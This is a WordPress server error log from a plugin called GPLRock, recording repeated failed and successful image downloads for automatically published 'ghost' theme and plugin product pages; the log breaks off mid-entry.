wpbakery-page-builder-add-on-css3-accordion [02-Apr-2026 20:14:35 UTC] GPLRock: Image downloaded successfully for product contact-form-7-pardot-integration-contact-form-7-account-engagement-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1c0d3e6.webp [02-Apr-2026 20:14:35 UTC] GPLRock: Using pre-downloaded image for product contact-form-7-pardot-integration-contact-form-7-account-engagement-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c1c0d3e6.webp [02-Apr-2026 20:14:35 UTC] GPLRock: Ghost product published with image - Product ID: contact-form-7-pardot-integration-contact-form-7-account-engagement-integration [02-Apr-2026 20:14:35 UTC] GPLRock: Image download failed for product behanceomatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:37 UTC] GPLRock: Image download failed for product behanceomatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/behanceomatic-post-generator-plugin-for-wordpress-24591.webp for product behanceomatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:39 UTC] GPLRock: Image download failed for product behanceomatic-post-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:41 UTC] GPLRock: Image download failed for product behanceomatic-post-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/behanceomatic-post-generator-plugin-for-wordpress-24591.webp for product behanceomatic-post-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:43 UTC] GPLRock WARNING: Image download failed for product behanceomatic-post-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/behanceomatic-post-generator-plugin-for-wordpress-24591.webp [02-Apr-2026 20:14:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: behanceomatic-post-generator-plugin-for-wordpress [02-Apr-2026 20:14:44 UTC] GPLRock: Image download failed for product instagram-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:46 UTC] GPLRock: Image download failed for product instagram-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-for-woocommerce-16284.webp for product instagram-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:48 UTC] GPLRock: Image download failed for product instagram-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:50 UTC] GPLRock: Image download failed for product instagram-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:14:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/instagram-for-woocommerce-16284.webp for product instagram-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:14:52 UTC] GPLRock WARNING: Image download failed for product instagram-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/instagram-for-woocommerce-16284.webp [02-Apr-2026 20:14:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: instagram-for-woocommerce [02-Apr-2026 20:15:03 UTC] GPLRock: Image download failed for product dione-conference-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:05 UTC] GPLRock: Image download failed for product dione-conference-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dione--conference--event-wordpress-theme-15858.webp for product dione-conference-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:07 UTC] GPLRock: Image download failed for product dione-conference-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:09 UTC] GPLRock: Image download failed for product dione-conference-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dione--conference--event-wordpress-theme-15858.webp for product dione-conference-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:11 UTC] GPLRock WARNING: Image download failed for product dione-conference-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dione--conference--event-wordpress-theme-15858.webp [02-Apr-2026 20:15:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dione-conference-event-wordpress-theme [02-Apr-2026 20:15:12 UTC] GPLRock: Image download failed for product the-next-mag-ecommerce-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:14 UTC] GPLRock: Image download failed for product the-next-mag-ecommerce-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-next-mag---ecommerce-magazine-wordpress-theme-7514.webp for product the-next-mag-ecommerce-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:16 UTC] GPLRock: Image download failed for product the-next-mag-ecommerce-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:18 UTC] GPLRock: Image download failed for product the-next-mag-ecommerce-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-next-mag---ecommerce-magazine-wordpress-theme-7514.webp for product the-next-mag-ecommerce-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:20 UTC] GPLRock WARNING: Image download failed for product the-next-mag-ecommerce-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/the-next-mag---ecommerce-magazine-wordpress-theme-7514.webp [02-Apr-2026 20:15:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-next-mag-ecommerce-magazine-wordpress-theme [02-Apr-2026 20:15:20 UTC] GPLRock: Image download failed for product planet-shakers-church-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:22 UTC] GPLRock: Image download failed for product planet-shakers-church-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/planet-shakers--church--religion-wordpress-theme-28298.webp for product planet-shakers-church-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:25 UTC] GPLRock: Image download failed for product planet-shakers-church-religion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:27 UTC] GPLRock: Image download failed for product planet-shakers-church-religion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/planet-shakers--church--religion-wordpress-theme-28298.webp for product planet-shakers-church-religion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:29 UTC] GPLRock WARNING: Image download failed for product planet-shakers-church-religion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/planet-shakers--church--religion-wordpress-theme-28298.webp [02-Apr-2026 20:15:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: planet-shakers-church-religion-wordpress-theme [02-Apr-2026 20:15:29 UTC] GPLRock: Image download failed for product manzil-construction-and-building-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:31 UTC] GPLRock: Image download failed for product manzil-construction-and-building-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manzil---construction-and-building-wordpress-theme-13171.webp for product manzil-construction-and-building-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:33 UTC] GPLRock: Image download failed for product manzil-construction-and-building-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:35 UTC] GPLRock: Image download failed for product manzil-construction-and-building-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manzil---construction-and-building-wordpress-theme-13171.webp for product manzil-construction-and-building-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:37 UTC] GPLRock WARNING: Image download failed for product manzil-construction-and-building-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/manzil---construction-and-building-wordpress-theme-13171.webp [02-Apr-2026 20:15:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: manzil-construction-and-building-wordpress-theme [02-Apr-2026 20:15:38 UTC] GPLRock: Image download failed for product techogy-it-service-and-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:40 UTC] GPLRock: Image download failed for product techogy-it-service-and-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techogy---it-service-and-technology-wordpress-theme-26472.webp for product techogy-it-service-and-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:42 UTC] GPLRock: Image download failed for product techogy-it-service-and-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:44 UTC] GPLRock: Image download failed for product techogy-it-service-and-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/techogy---it-service-and-technology-wordpress-theme-26472.webp for product techogy-it-service-and-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:46 UTC] GPLRock WARNING: Image download failed for product techogy-it-service-and-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/techogy---it-service-and-technology-wordpress-theme-26472.webp [02-Apr-2026 20:15:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: techogy-it-service-and-technology-wordpress-theme [02-Apr-2026 20:15:46 UTC] GPLRock: Image download failed for product altair-travel-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:48 UTC] GPLRock: Image download failed for product altair-travel-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/altair--travel-agency-wordpress-30125.webp for product altair-travel-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:51 UTC] GPLRock: Image download failed for product altair-travel-agency-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:53 UTC] GPLRock: Image download failed for product altair-travel-agency-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/altair--travel-agency-wordpress-30125.webp for product altair-travel-agency-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:55 UTC] GPLRock WARNING: Image download failed for product altair-travel-agency-wordpress. URL: https://meldwp.com/wp-content/uploads/altair--travel-agency-wordpress-30125.webp [02-Apr-2026 20:15:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: altair-travel-agency-wordpress [02-Apr-2026 20:15:55 UTC] GPLRock: Image download failed for product canabiz-marijuana-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:57 UTC] GPLRock: Image download failed for product canabiz-marijuana-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:15:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/canabiz---marijuana-wordpress-theme-2954.webp for product canabiz-marijuana-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:15:59 UTC] GPLRock: Image download failed for product canabiz-marijuana-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:01 UTC] GPLRock: Image download failed for product canabiz-marijuana-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/canabiz---marijuana-wordpress-theme-2954.webp for product canabiz-marijuana-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:04 UTC] GPLRock WARNING: Image download failed for product canabiz-marijuana-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/canabiz---marijuana-wordpress-theme-2954.webp [02-Apr-2026 20:16:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: canabiz-marijuana-wordpress-theme [02-Apr-2026 20:16:04 UTC] GPLRock: Image download failed for product poolservices-maintenance-cleaning-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:06 UTC] GPLRock: Image download failed for product poolservices-maintenance-cleaning-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/poolservices---maintenance--cleaning-theme-32035.webp for product poolservices-maintenance-cleaning-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:08 UTC] GPLRock: Image download failed for product poolservices-maintenance-cleaning-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:10 UTC] GPLRock: Image download failed for product poolservices-maintenance-cleaning-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/poolservices---maintenance--cleaning-theme-32035.webp for product poolservices-maintenance-cleaning-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:12 UTC] GPLRock WARNING: Image download failed for product poolservices-maintenance-cleaning-theme. URL: https://meldwp.com/wp-content/uploads/poolservices---maintenance--cleaning-theme-32035.webp [02-Apr-2026 20:16:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: poolservices-maintenance-cleaning-theme [02-Apr-2026 20:16:12 UTC] GPLRock: Image download failed for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:14 UTC] GPLRock: Image download failed for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fashion-store---hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme-27608.webp for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:17 UTC] GPLRock: Image download failed for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:19 UTC] GPLRock: Image download failed for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fashion-store---hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme-27608.webp for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:21 UTC] GPLRock WARNING: Image download failed for product fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fashion-store---hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme-27608.webp [02-Apr-2026 20:16:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fashion-store-hanbags-shoer-rtl-responsive-woocommerce-wordpress-theme [02-Apr-2026 20:16:21 UTC] GPLRock: Image download failed for product charity-club-fundraising-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:23 UTC] GPLRock: Image download failed for product charity-club-fundraising-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charity-club---fundraising-wordpress-theme-27498.webp for product charity-club-fundraising-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:25 UTC] GPLRock: Image download failed for product charity-club-fundraising-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:27 UTC] GPLRock: Image download failed for product charity-club-fundraising-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:16:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charity-club---fundraising-wordpress-theme-27498.webp for product charity-club-fundraising-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:16:30 UTC] GPLRock WARNING: Image download failed for product charity-club-fundraising-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/charity-club---fundraising-wordpress-theme-27498.webp [02-Apr-2026 20:16:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charity-club-fundraising-wordpress-theme [02-Apr-2026 20:17:08 UTC] GPLRock: Image downloaded successfully for product preston-fruit-company-organic-farming-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-86e81646.jpg [02-Apr-2026 20:17:08 UTC] GPLRock: Using pre-downloaded image for product preston-fruit-company-organic-farming-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-86e81646.jpg [02-Apr-2026 20:17:08 UTC] GPLRock: Ghost product published with image - Product ID: preston-fruit-company-organic-farming-wordpress-theme [02-Apr-2026 20:17:10 UTC] GPLRock: Image downloaded successfully for product ahamag-modern-magazine-html-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68093668.png [02-Apr-2026 20:17:10 UTC] GPLRock: Using pre-downloaded image for product ahamag-modern-magazine-html-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68093668.png [02-Apr-2026 20:17:10 UTC] GPLRock: Ghost product published with image - Product ID: ahamag-modern-magazine-html-template [02-Apr-2026 20:17:12 UTC] GPLRock: Image downloaded successfully for product petmark-responsive-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d52446e4.jpg [02-Apr-2026 20:17:12 UTC] GPLRock: Using pre-downloaded image for product petmark-responsive-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d52446e4.jpg [02-Apr-2026 20:17:12 UTC] GPLRock: Ghost product published with image - Product ID: petmark-responsive-woocommerce-wordpress-theme [02-Apr-2026 20:17:14 UTC] GPLRock: Image downloaded successfully for product draven-multipurpose-creative-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f72fc172.jpg [02-Apr-2026 20:17:14 UTC] GPLRock: Using pre-downloaded image for product draven-multipurpose-creative-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f72fc172.jpg [02-Apr-2026 20:17:14 UTC] GPLRock: Ghost product published with image - Product ID: draven-multipurpose-creative-theme [02-Apr-2026 20:17:15 UTC] GPLRock: Image downloaded successfully for product osterisk-voip-cloud-services-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-afa68d32.jpg [02-Apr-2026 20:17:15 UTC] GPLRock: Using pre-downloaded image for product osterisk-voip-cloud-services-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-afa68d32.jpg [02-Apr-2026 20:17:15 UTC] GPLRock: Ghost product published with image - Product ID: osterisk-voip-cloud-services-wordpress-theme [02-Apr-2026 20:17:17 UTC] GPLRock: Image downloaded successfully for product bagja-responsive-multi-concept-one-page-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-309f8de1.jpg [02-Apr-2026 20:17:17 UTC] GPLRock: Using pre-downloaded image for product bagja-responsive-multi-concept-one-page-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-309f8de1.jpg [02-Apr-2026 20:17:17 UTC] GPLRock: Ghost product published with image - Product ID: bagja-responsive-multi-concept-one-page-portfolio-theme [02-Apr-2026 20:17:19 UTC] GPLRock: Image downloaded successfully for product eunice-photography-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54c8611c.jpg [02-Apr-2026 20:17:19 UTC] GPLRock: Using pre-downloaded image for product eunice-photography-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54c8611c.jpg [02-Apr-2026 20:17:19 UTC] GPLRock: Ghost product published with image - Product ID: eunice-photography-portfolio-wordpress-theme [02-Apr-2026 20:17:20 UTC] GPLRock: Image downloaded successfully for product sewell-photography-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e439214c.jpg [02-Apr-2026 20:17:20 UTC] GPLRock: Using pre-downloaded image for product sewell-photography-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e439214c.jpg [02-Apr-2026 20:17:20 UTC] GPLRock: Ghost product published with image - Product ID: sewell-photography-wordpress-theme [02-Apr-2026 20:17:22 UTC] GPLRock: Image downloaded successfully for product barn2media-woocommerce-private-store (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f51816f7.jpg [02-Apr-2026 20:17:22 UTC] GPLRock: Using pre-downloaded image for product barn2media-woocommerce-private-store: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f51816f7.jpg [02-Apr-2026 20:17:22 UTC] GPLRock: Ghost product published with image - Product ID: barn2media-woocommerce-private-store [02-Apr-2026 20:17:23 UTC] GPLRock: Image downloaded successfully for product amp-page-builder-compatibility (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b55d28a4.png [02-Apr-2026 20:17:23 UTC] GPLRock: Using pre-downloaded image for product amp-page-builder-compatibility: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b55d28a4.png [02-Apr-2026 20:17:23 UTC] GPLRock: Ghost product published with image - Product ID: amp-page-builder-compatibility [02-Apr-2026 20:18:12 UTC] GPLRock: Image download failed for product ecoclean-house-cleaning-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:14 UTC] GPLRock: Image download failed for product ecoclean-house-cleaning-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecoclean---house-cleaning-company-wordpress-theme-28860.webp for product ecoclean-house-cleaning-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:16 UTC] GPLRock: Image download failed for product ecoclean-house-cleaning-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:19 UTC] GPLRock: Image download failed for product ecoclean-house-cleaning-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecoclean---house-cleaning-company-wordpress-theme-28860.webp for product ecoclean-house-cleaning-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:21 UTC] GPLRock WARNING: Image download failed for product ecoclean-house-cleaning-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecoclean---house-cleaning-company-wordpress-theme-28860.webp [02-Apr-2026 20:18:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecoclean-house-cleaning-company-wordpress-theme [02-Apr-2026 20:18:21 UTC] GPLRock: Image download failed for product rasalina-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:23 UTC] GPLRock: Image download failed for product rasalina-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rasalina--personal-portfolio-wordpress-theme-24129.webp for product rasalina-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:25 UTC] GPLRock: Image download failed for product rasalina-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:27 UTC] GPLRock: Image download failed for product rasalina-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rasalina--personal-portfolio-wordpress-theme-24129.webp for product rasalina-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:29 UTC] GPLRock WARNING: Image download failed for product rasalina-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rasalina--personal-portfolio-wordpress-theme-24129.webp [02-Apr-2026 20:18:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rasalina-personal-portfolio-wordpress-theme [02-Apr-2026 20:18:29 UTC] GPLRock: Image download failed for product kotona-software-and-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:31 UTC] GPLRock: Image download failed for product kotona-software-and-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kotona---software-and-app-landing-wordpress-theme-2468.webp for product kotona-software-and-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:34 UTC] GPLRock: Image download failed for product kotona-software-and-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:36 UTC] GPLRock: Image download failed for product kotona-software-and-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kotona---software-and-app-landing-wordpress-theme-2468.webp for product kotona-software-and-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:38 UTC] GPLRock WARNING: Image download failed for product kotona-software-and-app-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kotona---software-and-app-landing-wordpress-theme-2468.webp [02-Apr-2026 20:18:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kotona-software-and-app-landing-wordpress-theme [02-Apr-2026 20:18:38 UTC] GPLRock: Image download failed for product bazaar-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:40 UTC] GPLRock: Image download failed for product bazaar-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bazaar---ecommerce-wordpress-theme-29500.webp for product bazaar-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:42 UTC] GPLRock: Image download failed for product bazaar-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:44 UTC] GPLRock: Image download failed for product bazaar-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 20:18:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bazaar---ecommerce-wordpress-theme-29500.webp for product bazaar-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 20:18:47 UTC] GPLRock WARNING: Image download failed for product bazaar-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bazaar---ecommerce-wordpress-theme-29500.webp [02-Apr-2026 20:18:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bazaar-ecommerce-wordpress-theme [02-Apr-2026 20:18:47 UTC] GPLRock: Image download failed for product fundbar-fundraising-charity-wordpress-theme (attempt 1/3). HTTP 